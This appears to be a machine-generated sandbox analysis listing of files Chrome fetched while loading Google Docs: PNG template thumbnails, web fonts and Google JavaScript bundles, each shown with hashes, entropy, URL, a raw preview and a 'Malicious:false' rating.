                                                                                                                                                                                                                                        SHA1:7959ABE9C7C632360209364838E16F8909099A03
                                                                                                                                                                                                                                        SHA-256:929EC2B0F87A73827EFC23BF8BAC039070AA5857FF6DA2D642F9D42DDD0B9914
                                                                                                                                                                                                                                        SHA-512:77049D9FD57FCD67BB02AF6696B21008F870E26A0E542F6FD33A18DDD11FFD6F836C67A5133AFDE2FF355DB85BA6327BA93F4D513FD34B8E24C64D20596583DF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1lZLQSu__YrYfBBaxt_t1x7fGvti0ui6lQM9K_cVjSOI_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx..........#v3..M#.a._.v...v...........@X...ri.y)..p.&;......-.p.g(PUI*.[.ff..6..1.....6... ..t.......~.c...s.b^3f...0.u..............{$..s.b..Z..;.SH{....V[a>P0...^Y}...V.n.^X..j..+.^....;.K...x.V..ji....@~..0g.O..1....'..U'..z.}.[b..,./m2k....<....X.g....p..N.......J..E.E.]..{.....F(......Q..;.^.".[=po...G............X...s...r&...d....!...V.^.MC...>.....d..!;.N..ub......Q....Gh....(......F...(q..l..$...%m...'..]...z+.?[?5...b.......g4u'w...l..s.MV..3.wXf`.fF..!...!w..9..ln<_......m..N.K.n.b>Hp.\........X:GB._..^BW.g...p>=::a.1.F..6.("7..k....h..W.J....2&5...`..%....C.....R.Ph`.."..@.v}...7..4.....D:.B..bi."..@..$:JP..S..[..i..\..G.N...r.c..LLf.Q.[m..]kK...S.{._m.....K.Z.da.....g..........A .V.........m....../.%I...+..c.4.~].\f.{hW.P....G.,.e....Q.,.}...@y...p[.,#{!B...a.<./.[........z....=.}.../w...wi=....... ...z.... ....6...,..$....jv....W...&B..7...W]....{...........X6.........g^935.)...9u<~...B
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):87803
                                                                                                                                                                                                                                        Entropy (8bit):7.995938745494088
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:IXRFs3n1Ive1APS/KP3eCG+3j0V9K5MpxFRS6tX6xm4hHiWrhr:I6FIve1Q8Kf5G+AXpxFRS6AUehr
                                                                                                                                                                                                                                        MD5:73A461CC50B98AF30026F1795678AD80
                                                                                                                                                                                                                                        SHA1:9B0467D961807075CF95D9BA88887AE07439E996
                                                                                                                                                                                                                                        SHA-256:9CA380C26A8CA41830B0102893B2838201B357DA52E3BEFF5E074FAF6A868229
                                                                                                                                                                                                                                        SHA-512:93F34505BFE843A2DB30CBB31197B26951EB5C9B905357468AFFBDFA9BDB17F18EF7715AA9A740F6E9BB6C0999403AAD4B99E60EE79A4748CC3613A601C7A0B1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1ZA8vS-dUu4fhMtjFiusEtZkGI6vCs720VDj6gPIWcjc_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..V.IDATx...A.....0.Q..O.O..b%..Q.@X...r.. ,.a..rf.M3yk...@.Y...C.O.'.s..61.]-.C.....`H....i9...e..v..)......v(.}J..^..R.;9.9...j(=.VjX.&..QJ....M....G.v.......)b....r..9..n...f...n...3..u.z..v`...)1y.%...n.m^......a.%...9.N).'...H..S:....=.@R-...5j .-.(F.kiUr&w.1..`Q.r.!p$.....@....:G.H..e....\...e....lzci.!p|......(......i#.?.,.!....<....z.!G.....6...O.~}.M.,....l7..v.M!..W.&.5.C*.../.`S$.....V...,..8.S.K.....\'R..P) h'.........).........H.X..X.......t..a`...`.o.\.D.P."^...#.j.9pq...j......%y$B...zi....".^..!....;...)..V....*^.y........_......5.D....1.3..=k.!O.)utZ<...YC.]ATjq....!t.|'ff;......C.....15{~......Sk:3..o--.t.@U.s.._z.;..!*n.._^?./..W>..O}..Z8.f...e...'d.%z.`..h.6.E.D.y"%rP2.t. ..G;B...ef..-7...u...H3c.b.G..?...f.........8.Za.Ws..=.._.<..vL.@.....Y...}.jD.......^.!9,.....5../..Czd.2-.0...j..._../..!......c.eM..fGc.'.......{..r.l.`.r..Uke...../.-....;.\.|.....I....m.T....P.f.:.x....Y.6.....T..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (762)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2627148
                                                                                                                                                                                                                                        Entropy (8bit):5.634343393804168
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:gmTLsDwnN6ZS1Y/F3PZ95HXGB+LjkZm8cM1A540xt:gWrbY/VtHXw+XzIE/xt
                                                                                                                                                                                                                                        MD5:8C425EF9E02A9CE4EED19D48AB7B3416
                                                                                                                                                                                                                                        SHA1:E2E8229DF2606A9DC85301539E1D40C61C20EB73
                                                                                                                                                                                                                                        SHA-256:360213251F8F0C199CCA6FB3FD6B12DAF884CB318D4AD57E53DF34A479E5C8C2
                                                                                                                                                                                                                                        SHA-512:D8ADE94A7701D96CBEA2F96BF9D18D1DFC23A402E4CBF8FEC5F5935C327D86F3A9C9082D145C89C17182F769476B9463D1E9A1D7BB7BA1E9011051B2F9B5DE01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://docs.google.com/static/document/client/js/3866954191-client_js_prod_kix_app.js
                                                                                                                                                                                                                                        Preview:mK(G1a);.var VPf="\n-------------\n",zN=" - ",WPf=" - 24px)",XPf=' aria-checked="',YPf=' aria-controls="',ZPf=' aria-describedby="',$Pf=' aria-disabled="true"',aQf=" aria-disabled='true'",bQf=' aria-hidden="true"',cQf=' aria-hidden="true"><div jsname="',dQf=" aria-hidden='true'",eQf=" aria-invalid='true'",AN=' aria-label="',BN=' aria-labelledby="',fQf=' aria-valuemin="0" aria-valuemax="1" aria-valuenow="',gQf=" but found ",hQf=" by ",iQf=" characters entered",jQf=" characters remaining",kQf=' checked="',CN=.' class="',lQf=' data-disable-esc-to-close="',mQf=' data-hovercard-id="',nQf=' data-idom-class="',oQf=' data-name="',pQf=' data-progress-announcement="',qQf=' data-provided-aria-labelledby="',rQf=' data-tooltip-classes="',sQf=' data-tooltip-hide-delay-ms="',tQf=' data-tooltip-id="',uQf=' data-tooltip-show-delay-ms="',vQf=' data-tooltip-x-position="',wQf=' data-tooltip-y-position="',xQf=' data-tooltip="',yQf=" data-use-native-focus-logic='true'",zQf=" disabled",AQf=' disabled="',BQf=
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (958)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3340
                                                                                                                                                                                                                                        Entropy (8bit):5.572000833282149
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:DEbfw/K2C/mcsLaSbfegrNAM+RyQ41sFCK02N+3vuVXxM8Vq9RF7VauMMGVcFZrE:qfwinm/bfegrNAVRytW4324gBfErVZVE
                                                                                                                                                                                                                                        MD5:4062B7A556AAADC4BC2500E44384A77E
                                                                                                                                                                                                                                        SHA1:572F12056CF698111FB4BD1E965CA0F2F31626E8
                                                                                                                                                                                                                                        SHA-256:B149B0AE8C48381D1635FDE5542B9CB77EFA326A8140A235CAEA2AE498EE2211
                                                                                                                                                                                                                                        SHA-512:97808C54B99F3EE4B855D5049C49CA6ACA2D4AF02889AE29903CB2EC1B8E172456541DE9DB2646BDDB7BDBFDAF18224DCA7E61FF178861CC236CF3F248160394
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:"use strict";this.default_SocialPeopleHovercardUi=this.default_SocialPeopleHovercardUi||{};(function(_){var window=this;.try{._.y("Wt6vjf");.var KA=function(a){this.qa=_.B(a,0,KA.qb)};_.J(KA,_.G);KA.prototype.Ua=function(){return _.N(this,1)};KA.prototype.Pb=function(a){return _.Tm(this,1,a)};KA.qb="f.bo";var LA=function(){_.Qp.call(this)};_.J(LA,_.Qp);LA.prototype.tb=function(){this.Dt=!1;MA(this);_.Qp.prototype.tb.call(this)};LA.prototype.H=function(){NA(this);if(this.xl)return OA(this),!1;if(!this.Ou)return PA(this),!0;this.dispatchEvent("p");if(!this.Cr)return PA(this),!0;this.kq?(this.dispatchEvent("r"),PA(this)):OA(this);return!1};.var QA=function(a){var b=new _.qv(a.bB);a.ss!=null&&_.yv(b,"authuser",a.ss);return b},OA=function(a){a.xl=!0;var b=QA(a),c="rt=r&f_uid="+_.yn(a.Cr);_.Cr(b,(0,_.fj)(a.N,a),"POST",c)};.LA.prototype.N=function(a){a=a.target;NA(this);if(_.Ir(a)){this.Yo=0;if(this.kq)this.xl=!1,this.dispatchEvent("r");else if(this.Ou)this.dispatchEvent("s");else{try{var b=_
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65824
                                                                                                                                                                                                                                        Entropy (8bit):7.991317996604023
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:nhE7+jyhBS3gOSlRbHo8JcMsshufPgSQmUgRUJ4xCjgpN8JtQpA+RlDLpQ:nhE7NB6Bn2FAQm5Uec8e+/RlDLpQ
                                                                                                                                                                                                                                        MD5:FD04D6A38E980EA0505E49D5C0D6F9A0
                                                                                                                                                                                                                                        SHA1:2CF198E38A6626517929E38578011532238F6AB6
                                                                                                                                                                                                                                        SHA-256:9909587F62CDA63C3EBD40624EA8F3E00EA7C307C81C0E04A842CE91FBE30878
                                                                                                                                                                                                                                        SHA-512:DF3FB32B708CCB6C94923C13509E93B3158F9386AE923B1A6832871119C7DBCCBD2A5B9AF67FF81E3A9A30E7496689585BC02250DF825F8BB4611FA55213B17F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx............G."tFb.E... ,@X..... ,.a........a...@X..... ,@X...N.{..lI....Mhm.m.c.m.m..Y>..":"#..O].=..ldE........U..z...=s>Ry.1y.....;u.q...Sw.w.qG}../...s.[.....?.-Pp.qv....H..9.2c.|Ws..YZ.c..;.r.qG.l.:W.q..Zg....(..L....^...)....e;g....N....V..N.j.....H.Q.*Z,....._h..=z]*.0.29..92Xp.F...../........O...g.`.S.n=~L.Q...)M.*Q....=aR..d......qg.p.,.....+o..n.]?.O>..g_|..'.}.?C......;r<.....o...hN...........*ua.o.......z.@.t...........t..33..`..>w.s.<I..t.).?z.{._~...;.>u6u.....z.Kf..CG.M.Lu...;..........B.....L0.<....)...M..`....V...4..........E.....e0..E...;`.p....R..8o........}..m...4Y.i.I.&-Z.W?.]0..../j...i...I.u..7@Z.mG.. ..... ..Ys.w.Z.A.F...?.c..X.j..E!..H..:...vA...D.[.kO.....R..|.q..1..7n.....9.N^.UR%:.I.:K.k.5.....q..!#Gc4q..&..k......r...w2.....C..%g31+...........i.[...o.E.-...M7......d*W...O&.......w.%.@t..X..{`(..!........=...?...w.Pc..+...cg`.t..Y.X.7k....,^.....&....;E.i6
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 116852, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):116852
                                                                                                                                                                                                                                        Entropy (8bit):7.997713935602442
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:bDllz3cdHVFRX/KmeqWq6kqLw37wjIX4yUyga1SX:XllIJnNrb6kqLEFIRiK
                                                                                                                                                                                                                                        MD5:9FC7A466292A81DBCEB5B9F194B87757
                                                                                                                                                                                                                                        SHA1:B9994940CAE8121BB4ACC923972EA0B0B6BF177F
                                                                                                                                                                                                                                        SHA-256:8BA9D0704A43A49CD21D4917C76A1828BF6D60EAB09612A2049199652465BBFA
                                                                                                                                                                                                                                        SHA-512:5A721B05C621E2A10642A275372B21A4A2813F37FBC24B8CFAA2EE2D8F95D06737DD17E921D4BD90C50A17BC9325B14B4ECED296BA9BDF92DF8B5389D9268C19
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ebgaramond/v30/SlGFmQSNjdsmc35JDF1K5GRwUjcdlttVFm-rI7e8QI9_.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......t..........................................h....`?STATD......... .....P..6.$..L. ..L...n..[M...1.....8DE..Z-...fH}.g..9."G..f...W9..C..'O....yfU%. M............X.<..I..s6=.J/.....Q@..C.].b."r.eU7=..L?...L....(m..-4.uq8.t...JT...h.H.s{P;.&.7.J..L3....p..-*.JM.G....[......&"".U@?`6;.y..I...f=..y.Z.S.........G.._.....m.h....c....*.A. .Ul:rv".."...+[.^.&....B..-jz**..u.C.,..e....'?..(.zu..J..!..f."..H...1m.m]....b.xX..w...D]..m ....Ob.b.2......`...!ix]DmV.$.QJb[..C|j..S....h....9:..B*s...bD..<V....rO.#3......P....I.S...F..=..<[.......lL.*.".*..`.vH.h...5...4..7..b.{~.......Y..h....kv..}.......t.H..R}Im...8{..@..J.2..{.Y,.9.....&x..4..5...../.7.-_do.9{.=..._...m..c..}E.(5)...vdM.o.4;...........|6yzo).igF.+..V)(..TV.<.M._sb.s.d>d..)..~.t..,...n.g.y.\\.....).4Ml._P.s.J..k:.5..+.A.v.....5 .9.UD.D...Kt.mG\............ppg.$.6...'RYJ......3D........E..1-...(....%$@...L.T...i)P.B.h).RJ......P....t...+R...P.....$...i......J.....v..X....,?......[..!keF
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):46356
                                                                                                                                                                                                                                        Entropy (8bit):7.992270232521654
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:dXU5QADZayzK0LblPsIxaNmf5P9ocyhxYvErn748FJO7lwPqvFEFLaJImcY9usp9:dXU5QAdBzK0tsIEero4Erbolw8Um1p9
                                                                                                                                                                                                                                        MD5:BA49C3D0575A1F5820824E4AD4C17DA1
                                                                                                                                                                                                                                        SHA1:FBAE6DD7B9EB27CFCAD43BF179C242EB05DD035B
                                                                                                                                                                                                                                        SHA-256:102736900D8EC23867F45C5741C28724C2E566BD0A989065036ECBFCBA80BA16
                                                                                                                                                                                                                                        SHA-512:82CBEA81F7563AE48754708CB508FD4BE5B8FBB8864608021E49A75BD140495571E336C493EF270EF4BEA98AA7629D6767B3BD23B214888262FCA853E06A0098
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1370M8TLqzIE6UM_uvAql6dvr6LZpQJwj-K52MvToX00_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...A.....0..wy...[...p.a.... ,.a......({.,...E. ..(...o:y'<.....ei....Kv.X.v...#\.V.....t..-......l..'.&.(..^,.v.....U...ka.`n.....C..}..Uj.S~8....n2....W8.&.@..Wx8...;.....Ya.3g.f.0.m....9...L..$..I.Iti'...Rh..6.#4..I.5..i.`.|<.g`.x...".U..AGT_...?..H84.......R....^..v.{......]2...0|C.G...{...q....Z)...|.`...:a..w.....6>..n....IdA.....cR..0.1.A1.e......?.....=u...q.t........Dd.0...!).m0m3.d...8.1..j ..T*.ck.=.....N1.x.!...U .i#L..../.d.....>...]....o......@p...x...n..Y.!..W.,..^..+.`@...".......R7@..V.2.(...yAW..C.4lN..C.E..#.1A.P^....l.szT#....Dc.X...s&/&.*.....f9. .MX.)!....%..L......a...^..^l.O..]..9..Gf.:.....!......1.4`+.DO.=x\.O....$%aY.\...JPV...B../..f..ac.....MX<.....=q..D..F.QO.......J...3x........|xx...b+.....H..}.V../N..!..m.48T... ...!b..T.,.(y.IvP.gA...S..........g.U...`..5.".....<.J.(....I).T....ZR.i....4...q......D...&`..........#|..0.!\E....+z.v.KM.Tf.....*.Q.`....$..kd........p..,.Z<
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 126660, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):126660
                                                                                                                                                                                                                                        Entropy (8bit):7.997861876113917
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:nIMBZfE3pqhzhi59cQ34yg5HU38AkEUkautnlCtzfrgV+U0WH:lBRPA59X4yj5kEVautn4i0TWH
                                                                                                                                                                                                                                        MD5:E171410D243718D27D3C6BD5306ACA68
                                                                                                                                                                                                                                        SHA1:6BCDBCD43497AE839A84A26FB83D68BB07A4D5EE
                                                                                                                                                                                                                                        SHA-256:62205E2E2B22EFD49A3A0D1C10C5F59AFA8F4C59B087825FB904263E73489DDC
                                                                                                                                                                                                                                        SHA-512:B2167AE822A4CF64460FC88430B1CEB7B905EE35F88F16EF817BAE2FE924053875AB73E6BB170B3808C16D74D6B62E86261FFF0931C75AB0FEF5CE4217094908
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ebgaramond/v30/SlGDmQSNjdsmc35JDF1K5E55YMjF_7DPuGi-6_RUBg.woff2
                                                                                                                                                                                                                                        Preview:wOF2...................]..........................>...<..P.`?STATH...B.....P........6.$.... ..h...J..[}...*...xw...pE.......!.n.y.A..._......8|k...7.Au...HD...&W...O1...............o9.6y3....!... .p.?...j[+.0WQb..B.b?.A.....Q.n.....X(.L.0..n..=bf?........|...'....i'eT)U.\.2J.(.J..-U.Wv5.^..{n...........:,.E.a..Ix...o.t.....h..L...:........Z...+....D1...Q.1..Q..c*..x..)..&z....b....cQ./S...6......?.9.d..0......@j...0.....L?.;.g.zQ.R....">..U.U..d).*,.ZG9.1...b.U....Mn.=....q.......].+tqt.4..g5...$....(<.I&.4.kD.XV.\X>'me&&.W....".....BR...Tvws.z4y.m..{.&.6..=d.`/st.`..<..)I,x...X.G.F.....\.......==.].[.x..e.x...w..<~.X...i()MG._.)a..$$!.H......z.R.....z0.$$..f..w.....e...*HB....?..gY..(.....W..gy[@f..O5....*...0;......E.>.. .3!x4l...A...%.._/.h.c.w.e.(;d.H|1S/YL....}..M...0j.Y.~.......#..k..oBD5."...%..fXZB...............^....)..D....n..f.f.m.U.*.c...~..E|...d<H..%.....6."%i..b..5....?s(o.kM..~......_.....<d......i..~M.\....~w.....L..Q5..5]3
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 63468, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):63468
                                                                                                                                                                                                                                        Entropy (8bit):7.997125921810043
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:7VHV0J5uO4aGGdel+rMeg+uHjOkD9azI7tUuE+g:7ZyWaGMel+rMFdDOkD9ppxg
                                                                                                                                                                                                                                        MD5:340CBE64973D5E2577A9809034AF4C50
                                                                                                                                                                                                                                        SHA1:519CE8EAF950918B4ABCA85995378BF3A862905B
                                                                                                                                                                                                                                        SHA-256:C0194A8F127D184BE90A347BB1A1C3A6F3BB5A5B3F39A88DD7CE115ECA8580C8
                                                                                                                                                                                                                                        SHA-512:16BFB371FDB13BD926663C0429FD6D43EEFEBEAD1F74E2BE8A179EF359BA4BF9946A584919674311B182ADE095FEDE4BB024E5AFF94287153124532682F640B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/montserrat/v29/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCuM70w7.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............<.............................."...j..8.`?STATD..l.|........L..w..z..6.$..p. ..B.....([....i2..hv+...v..}......n......5..CY....n...Tzn[.,W.........I&2f....m....:tln..5.&.wc.H..."9K..#.J5.C.>....~.T..'I.....6\..xI.X..8...\.>.E%;<:G.%.. {..r....c.d.}....T..Yc.........&..(\T..r.B..3...7..."..fo.TI.lm.A..&....T.TZ.Ud.}...l..Y.=.....E5S56...._....}i~d{o.k.......?@.Ha]..z...K..h...W0.T|r....L.F..o..!^.....&o-l..-.[X.."..q..8L....iW...].0..L...NRd..WN.?..,.'..F..ibo..J..c...q...........}:...XP*.@%..x...NX.;R4..."......O:Uro.. +..)..=P..(..0k)..W\..}.BE...GFu.......@...s.s.E=.1..Qi..6 ...*Fab.o...X.1................q.....:c..Y+.2.8..N"...gUB..]!........=..l..y..2.,a|..Pjg.f.h......E..[..............D.q..k..E......?....\....t........u....pYK....ycRa.t].j%.Y'Z.x.C...v.wM.&.7w.V@j..O.P.$*S.+0......-Qhk._.R.J4..."\QA.Ts......o....X...-...$K.w........x.(....i..a:..!...uJEyEW..<...e@.Nq.@*T.T.n...]....zt@...`..M2....V....s..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2049)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14456
                                                                                                                                                                                                                                        Entropy (8bit):5.4707085201840036
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:IYim7O/sAg9U6KAQdkzFC+5aiWQLHO91tIuW:IoqUAh8vz7W2N
                                                                                                                                                                                                                                        MD5:678B03FE0FAF217F72657826DA4434A3
                                                                                                                                                                                                                                        SHA1:8440257C2077AB3B12A986BB42C61E8101555730
                                                                                                                                                                                                                                        SHA-256:554E912AFBA0302DF368EA48ED975A64B8528A70793071194FC7E86E62963730
                                                                                                                                                                                                                                        SHA-512:02C6C996E7FC5DEACF5DB40FCFFCB73D14BFC3898E0438778C7445B0292EAE41165C134ED621E81FB9A3657704325C523CB45D9629FF86280148B371A0416A91
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):78452
                                                                                                                                                                                                                                        Entropy (8bit):7.991910064665744
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:lfByokUZGEsfhPwBJWNqssPxri3BoL6z+Rq6k3ZF9tD43sd0cqTbdeO:lfBMkGE6hPmcNqsKE3iQ+vQ73D4Xc2bH
                                                                                                                                                                                                                                        MD5:BB30C72F623BC317BE9BA68E709E5817
                                                                                                                                                                                                                                        SHA1:EA38C1989EC1156AC9C464638D10C9380EF251DA
                                                                                                                                                                                                                                        SHA-256:C201FC3043928CBE7541790E44213B7C7C9ED77417586A3E9A5D013A05479FB7
                                                                                                                                                                                                                                        SHA-512:DBCFFAD0B8866E9364258404F772631B2D7A6F3E41C9C3E1F8BFDA7440AA68C73696E6F2F5F00C673B37855C54B1471A0018830C1CE34B0235B315D48A3238F9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1Vw1lJCryO-7gROWiodWQdYvfBPqzV9jZdjnc5_g3E_E_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..2;IDATx......... ...S...!...0...........@X..... ,@X..... ,.a............@X..... ,.a........a...@X..... ,@X..... ,.a....V.%..4(..0.(=F......^.'.!...P .%D*!.J5cv....j....;...?]....A....TiDY..~Q.\.L..9.s..o..9..&.u.}..L....eY.;....0.\. . .$..1M.[.....y..m.\..Y.M.t..c.6..k.4q.[..).....C..m.(.u]..a.......m[..u...y?v.@.A0....;.....$..B. .J."@... .B...^.w...D/q..L...~.H..r..k..A..#I2I.x.G}...b..M5M........r..,.eYY..+..4MO...]......~..y..8..q.. ....p8..._.|>S..iZUUu]..Gx.\...c...4..(...Zn..a..?.....,L.<ia.i.<..b.,cwb.g.v*...m...8-.J......:.....a.g9...(n...}.GQ4...$.., ."<....`.DUUa..yS|.....G.3.....a..'.@....*....!.R..!.).R..%(..(..PD..P.R ..AJ..+..u....R...yo...t:..|N...D"..#4".d2A...h.Z./...h.}9..^..X}:.......f.k...+......F.N.....#.....j.J......r....M.R.....Bq..o..q.....r.n.......o..q<...C.d2..G/R..t:..f%..jE...".......)...v..p8..D....v..(......2f.|X..C.......n7.._..IT....*...#5,l.X.. .2.G`.a2. ....|&.X,.<a..\n..C...v;..P(..G..J....3.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):10693
                                                                                                                                                                                                                                        Entropy (8bit):7.858999646429827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:HLkacSi3NuDzOUcdRXXzUdhdSRNiF70xHPrh3pHhiw6NpdSmxfsXd3vJ:r3guDz2R4ebxF3pQw4z/WXJvJ
                                                                                                                                                                                                                                        MD5:1E94B7B60FCD47DB5CF5172292220F6D
                                                                                                                                                                                                                                        SHA1:32C417D0537E73B2D432AF5527F3D7924CF7071F
                                                                                                                                                                                                                                        SHA-256:7FBFF67006DFD17883523CCEC40AE4A209839B5C3C247EDE9F97931977761ADE
                                                                                                                                                                                                                                        SHA-512:63B3260D9894B3D78DAF34D9C62299624921055984BFB7C041EE4EA2E922681259BB0EFDA860FD2415219C52572903910867D1F221341F7E762548DCF4A09B82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1ZAr9miZAn80G1XnpBQOjL7FFa4H-ttkz1DbYrAkYBn0_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..).IDATx.........0...%. l!...H... ,@X..... ,.a............@X..... ,.a........a...@X...............@X..... ,.a..... ,.a.......8....d....SX.....m..=n.m.........k1hDG..q.T......9yz..n.....e<.Z..I.....F..5....a....b..ZZ.Rm>F...._...h4j.2[/k.....v....f.5K...l>it.-M..a.ShL.0.....&zzT.@^.zCZ...q.j7*...7/^..An...z<.Xf.6.^.f....W.^.b..._..mmm-//...QQQ7n.p.j.=.........X..._.T....<...s&.mk.u.....g.`G..EZ...'O..*+........d...........=99....N..R'[.#~.3....!.h_9...).. mX..#....>..j9...7u.......8p //....hrss......nooW...._PP@...}.vEjEEEDDD]].1bcBBBxx..a)(..\...6{..m,.!.E.D...a.`.D.V*JSE.=Q.-g..E}...qF...^&.B.....E..a,s.m..V.......u&333%%...tENjii.4.L....J.._*.......HV...UMM.2.......rXss.......7..u..........;.....t2,.3r.q...Ac. am2N........<Z$..o.......M;.a..&N..V.Sjm...}||..<...~.z.-[v.....7......].......j...`....{...7.....?..G......O6...e.X2......D"5m...+.-.2<k.<.y.....2y.9 ....;E.,./......%....(..0,mXT....r.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 3640, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3640
                                                                                                                                                                                                                                        Entropy (8bit):7.935496811135212
